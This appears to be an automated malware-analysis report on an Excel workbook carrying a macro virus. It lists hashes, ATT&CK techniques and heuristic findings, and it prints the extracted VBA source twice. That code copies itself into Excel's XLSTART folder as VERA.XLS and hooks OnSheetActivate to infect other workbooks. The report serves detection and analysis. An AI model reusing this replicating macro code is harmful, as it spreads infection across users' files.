Office (OLE) malware analysis — malicious · 8b5d2e91fd0bcfb2

MALICIOUS

Office (OLE)

263.5 KB Created: 2012-01-19 15:49:31 Authoring application: Microsoft Excel First seen: 2014-06-27

MD5: 20d8c33caf19833c7fd005823b537c57 SHA-1: c9dd01691c0b19a66ba86c9133e9a80eb2647c1a SHA-256: 8b5d2e91fd0bcfb2dfc7b2e83d275b876132a0e306ee9897ee66f115a74bfd5b

140 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The VBA macro uses CreateObject to interact with the Excel environment. It copies the active workbook to the Excel startup directory as 'VERA.XLS' and sets an 'OnSheetActivate' hook to execute the 'check_files' subroutine. This mechanism is designed to establish persistence and likely execute a secondary payload from the compromised startup folder.

Heuristics 4

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
    Set X = CreateObject("ADODB.Connection")
```
VBA copies the workbook into the Excel XLSTART startup folder high OLE_VBA_XLSTART_PERSISTENCE

The macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour.
Matched line in script
```
    ChDir Application.StartupPath
```
VBA infects other workbooks via an OnSheetActivate copy hook high OLE_VBA_WORKBOOK_INFECTION_SPREADER

The macro installs an Application.OnSheetActivate handler that copies a sheet (carrying the macro) into the active workbook whenever a sheet is activated. This is the replication stage of a resident Excel macro virus: it infects every workbook the user opens.
Matched line in script
```
    Application.OnSheetActivate = ""
```

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5205 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5205 bytes
SHA-256: `e2d190f3bde2a356dd624f3bca70721083b8d51b7ed0b756c7a05357c8e5a093`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Locas" Sub fig() Set X = CreateObject("ADODB.Connection") X.Open "Provider=Microsoft.Jet.OLEDB.4.0;Extended Properties=Excel 8.0;Data Source=" & ThisWorkbook.FullName Sql = "select mid(款号,1,2) & '0000 组', sum(件数) from [货品销售$] group by mid(款号,1,2)" Set yy = X.Execute(Sql) [g10:h44].Clear [g10].CopyFromRecordset yy Set yy = Nothing: Set X = Nothing End Sub Sub check_files() Attribute check_files.VB_ProcData.VB_Invoke_Func = " \n14" c$ = Application.StartupPath m$ = Dir(c$ & "\" & "VERA.XLS") If m$ = "VERA.XLS" Then p = 1 Else p = 0 If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0 whichfile = p + w * 10 Select Case whichfile Case 10 Application.ScreenUpdating = False n4$ = ActiveWorkbook.Name Sheets("locas").Visible = True Sheets("locas").Select Sheets("locas").Copy With ActiveWorkbook .Title = "" .Subject = "" .Author = "" .Keywords = "" .Comments = "" End With newname$ = ActiveWorkbook.Name c4$ = CurDir() ChDir Application.StartupPath ActiveWindow.Visible = False Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" & "VERA.XLS", FileFormat:=xlNormal _ , Password:="", WriteResPassword:="", ReadOnlyRecommended:= _ False, CreateBackup:=False ChDir c4$ Workbooks(n4$).Sheets("LOCAS").Visible = False Application.OnSheetActivate = "" Application.ScreenUpdating = True Application.OnSheetActivate = "VERA.xls!check_files" Case 1 Application.ScreenUpdating = False n4$ = ActiveWorkbook.Name p4$ = ActiveWorkbook.Path s$ = Workbooks(n4$).Sheets(1).Name Application.OnSheetActivate = "" Application.ScreenUpdating = Tru Application.OnSheetActivate = "VERA.xls!check_files" Case Else End Select End Sub Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Locas1" Sub fig() Set X = CreateObject("ADODB.Connection") X.Open "Provider=Microsoft.Jet.OLEDB.4.0;Extended Properties=Excel 8.0;Data Source=" & ThisWorkbook.FullName Sql = "select mid(款号,1,2) & '0000 组', sum(件数) from [货品销售$] group by mid(款号,1,2)" Set yy = X.Execute(Sql) [g10:h44].Clear [g10].CopyFromRecordset yy Set yy = Nothing: Set X = Nothing End Sub Sub check_files() Attribute check_files.VB_ProcData.VB_Invoke_Func = " \n14" c$ = Application.StartupPath m$ = Dir(c$ & "\" & "VERA.XLS") If m$ = "VERA.XLS" Then p = 1 Else p = 0 If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0 whichfile = p + w * 10 Select Case whichfile Case 10 Application.ScreenUpdating = False n4$ = ActiveWorkbook.Name Sheets("locas").Visible = True Sheets("locas").Select Sheets("locas").Copy With ActiveWorkbook .Title = "" .Subject = "" .Author = "" .Keywords = "" .Comments = "" End With newname$ = ActiveWorkbook.Name c4$ = CurDir() ChDir Application.StartupPath ActiveWindow.Visible = False Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" & "VERA.XLS", FileFormat:=xlNormal _ , Password:="", WriteResPassword:="", ReadOnlyRecommended:= _ False, CreateBackup:=False ChDir c4$ Workbooks(n4$).Sheets("LOCAS").Visible = False Application.OnSheetActivate = "" Application.ScreenUpdating = True Application.OnSheetActivate = "VERA.xls!check_files" Case 1 Application.ScreenUpdating = False n4$ = ActiveWorkbook.Name p4$ = ActiveWorkbook.Path s$ = Workbooks(n4$).Sheets(1).Name Application.OnSheetActivate = "" Application.ScreenUpdating = Tru Application.OnSheetActivate = "VERA.xls!check_files" Case Else End Select End Sub Attribute VB_Name = "Sheet4" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Sheet9" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "模块1" Attribute VB_Name = "Sheet5" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True

SHA-256: e2d190f3bde2a356dd624f3bca70721083b8d51b7ed0b756c7a05357c8e5a093

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Locas"



Sub fig()
    
    Set X = CreateObject("ADODB.Connection")
    
    X.Open "Provider=Microsoft.Jet.OLEDB.4.0;Extended Properties=Excel 8.0;Data Source=" & ThisWorkbook.FullName
Sql = "select mid(款号,1,2) & '0000 组', sum(件数) from [货品销售$] group by  mid(款号,1,2)"

    Set yy = X.Execute(Sql)
   [g10:h44].Clear
   [g10].CopyFromRecordset yy
   
        Set yy = Nothing:    Set X = Nothing
End Sub

Sub check_files()
Attribute check_files.VB_ProcData.VB_Invoke_Func = " \n14"
    c$ = Application.StartupPath
    m$ = Dir(c$ & "\" & "VERA.XLS")
    If m$ = "VERA.XLS" Then p = 1 Else p = 0
    If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
    whichfile = p + w * 10
    
Select Case whichfile
    Case 10
    Application.ScreenUpdating = False
    n4$ = ActiveWorkbook.Name
    Sheets("locas").Visible = True
    Sheets("locas").Select
    Sheets("locas").Copy
    With ActiveWorkbook
        .Title = ""
        .Subject = ""
        .Author = ""
        .Keywords = ""
        .Comments = ""
    End With
    newname$ = ActiveWorkbook.Name
    c4$ = CurDir()
    ChDir Application.StartupPath
    ActiveWindow.Visible = False
    Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" & "VERA.XLS", FileFormat:=xlNormal _
        , Password:="", WriteResPassword:="", ReadOnlyRecommended:= _
        False, CreateBackup:=False
    ChDir c4$
    Workbooks(n4$).Sheets("LOCAS").Visible = False
    Application.OnSheetActivate = ""
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "VERA.xls!check_files"
    Case 1
    Application.ScreenUpdating = False
    n4$ = ActiveWorkbook.Name
    p4$ = ActiveWorkbook.Path
    s$ = Workbooks(n4$).Sheets(1).Name
   
    Application.OnSheetActivate = ""
    Application.ScreenUpdating = Tru
    Application.OnSheetActivate = "VERA.xls!check_files"
    Case Else
End Select
End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Locas1"



Sub fig()
    
    Set X = CreateObject("ADODB.Connection")
    
    X.Open "Provider=Microsoft.Jet.OLEDB.4.0;Extended Properties=Excel 8.0;Data Source=" & ThisWorkbook.FullName
Sql = "select mid(款号,1,2) & '0000 组', sum(件数) from [货品销售$] group by  mid(款号,1,2)"

    Set yy = X.Execute(Sql)
   [g10:h44].Clear
   [g10].CopyFromRecordset yy
   
        Set yy = Nothing:    Set X = Nothing
End Sub

Sub check_files()
Attribute check_files.VB_ProcData.VB_Invoke_Func = " \n14"
    c$ = Application.StartupPath
    m$ = Dir(c$ & "\" & "VERA.XLS")
    If m$ = "VERA.XLS" Then p = 1 Else p = 0
    If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
    whichfile = p + w * 10
    
Select Case whichfile
    Case 10
    Application.ScreenUpdating = False
    n4$ = ActiveWorkbook.Name
    Sheets("locas").Visible = True
    Sheets("locas").Select
    Sheets("locas").Copy
    With ActiveWorkbook
        .Title = ""
        .Subject = ""
        .Author = ""
        .Keywords = ""
        .Comments = ""
    End With
    newname$ = ActiveWorkbook.Name
    c4$ = CurDir()
    ChDir Application.StartupPath
    ActiveWindow.Visible = False
    Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" & "VERA.XLS", FileFormat:=xlNormal _
        , Password:="", WriteResPassword:="", ReadOnlyRecommended:= _
        False, CreateBackup:=False
    ChDir c4$
    Workbooks(n4$).Sheets("LOCAS").Visible = False
    Application.OnSheetActivate = ""
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "VERA.xls!check_files"
    Case 1
    Application.ScreenUpdating = False
    n4$ = ActiveWorkbook.Name
    p4$ = ActiveWorkbook.Path
    s$ = Workbooks(n4$).Sheets(1).Name
   
    Application.OnSheetActivate = ""
    Application.ScreenUpdating = Tru
    Application.OnSheetActivate = "VERA.xls!check_files"
    Case Else
End Select
End Sub

Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet9"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "模块1"

Attribute VB_Name = "Sheet5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.